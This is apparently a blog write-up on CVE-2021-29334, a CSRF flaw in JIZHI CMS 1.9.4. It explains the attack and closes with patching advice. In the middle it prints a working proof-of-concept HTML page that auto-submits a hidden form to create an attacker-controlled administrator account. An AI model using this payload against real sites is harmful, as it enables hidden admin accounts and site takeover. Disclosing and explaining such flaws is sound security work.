In today's post, we will discuss the recently found vulnerability in JIZHI CMS 1.9.4, which has been assigned the CVE ID of CVE-2021-29334. This vulnerability comes in the form of a CSRF (Cross-Site Request Forgery) attack that can be exploited by an attacker to add an administrative account to a JIZHI CMS 1.9.4 installation without the original admin's knowledge or consent. We will take you through the details of this vulnerability, discuss its impact, provide a code snippet to demonstrate how it can be exploited, and link to original references for further information.

Background

JIZHI CMS is a popular content management system (CMS) that allows users to easily manage their websites, blogs, and web-based applications. The latest version of this software, JIZHI CMS 1.9.4, contains a critical security vulnerability known as CVE-2021-29334. This vulnerability, discovered by security researchers, takes advantage of the application's inadequate protection against CSRF attacks.

Exploit Details

To better understand how this vulnerability can be exploited, let us first look at what a CSRF attack is. Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious website or application causes an authenticated user to perform unwanted actions on a web application in which they're currently authenticated. This can be dangerous, as it may allow the attacker to perform actions using the victim's credentials and permissions.

In the case of CVE-2021-29334, an attacker could exploit the vulnerability by convincing a user who has administrative access to the JIZHI CMS installation to visit a malicious website or click on a specially crafted link. The attacker could then use this vulnerability to add a new admin account to the victim's JIZHI CMS installation without their knowledge or consent.

Here's a code snippet that demonstrates how an attack exploiting this vulnerability could be crafted

<!DOCTYPE html>
<html>
    <body>
        <form action="https://[TARGET_JIZHI_CMS_URL]/admin.php/Admin/adminadd.html"; method="POST" enctype="multipart/form-data" id="csrf_form">
            <input type="hidden" name="username" value="malicious_admin" />
            <input type="hidden" name="password" value="malicious_password" />
            <input type="hidden" name="password_confirm" value="malicious_password" />
            <input type="hidden" name="email" value="malicious@email.com" />
        </form>
        <script>
            document.getElementById("csrf_form").submit();
        </script>
    </body>
</html>

In this code snippet, the attacker creates a fake form with the necessary fields to add a new admin account to the JIZHI CMS installation. The form's action is set to the target URL, and JavaScript is used to automatically submit the form when the HTML page is loaded. If the user with administrative access visits this web page, their logged-in session would be used to create an admin account controlled by the attacker.

Original References

If you'd like to dig deeper into this vulnerability and its details, you can refer to the following original references:

- Exploit Database

Conclusion

CVE-2021-29334 is a serious vulnerability that could have significant consequences if left undiscovered and unpatched. If you are using JIZHI CMS 1.9.4, it's essential to apply any available security patches or temporarily implement other security measures to protect your application from CSRF attacks.

Make sure to keep an eye on your JIZHI CMS installation and always stay up to date on the latest security news and updates to protect your website from potential threats.

Timeline

Published on: 11/23/2022 20:15:00 UTC
Last modified on: 11/28/2022 19:39:00 UTC